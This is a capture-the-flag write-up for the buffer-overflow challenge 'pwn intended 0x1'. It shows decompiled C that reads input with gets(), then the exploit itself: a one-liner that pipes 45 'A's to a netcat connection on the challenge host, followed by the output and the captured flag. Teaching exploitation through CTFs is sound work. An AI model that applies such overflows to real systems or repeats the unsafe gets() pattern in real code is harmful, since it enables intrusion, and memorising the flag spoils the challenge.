88ee32973e | ||
---|---|---|
.. | ||
README.md | ||
pwn-intended-0x1 |
README.md
pwn intended 0x1
The main idea finding the flag is Buffer Overflow.
Step-1:
I reversed the file with Ghidra.
undefined8 main(void)
{
char local_38 [44];
int local_c;
local_c = 0;
setbuf(stdout,(char *)0x0);
setbuf(stdin,(char *)0x0);
setbuf(stderr,(char *)0x0);
puts("Please pour me some coffee:");
gets(local_38);
puts("\nThanks!\n");
if (local_c != 0) {
puts("Oh no, you spilled some coffee on the floor! Use the flag to clean it.");
system("cat flag.txt");
}
return 0;
}
Step-2:
Clearly, this was a case for Buffer Overflow.
A simple command to overflow the buffer would give us the flag.
python -c 'print"A"*45' | nc chall.csivit.com 30001
The piping done other way round doesn't help though.
Output:
Please pour me some coffee:
Thanks!
Oh no, you spilled some coffee on the floor! Use the flag to clean it.
csictf{y0u_ov3rfl0w3d_th@t_c0ff33_l1ke_@_buff3r}
Voila! There we have our flag.
Step-3:
Finally the flag becomes:
csictf{y0u_ov3rfl0w3d_th@t_c0ff33_l1ke_@_buff3r}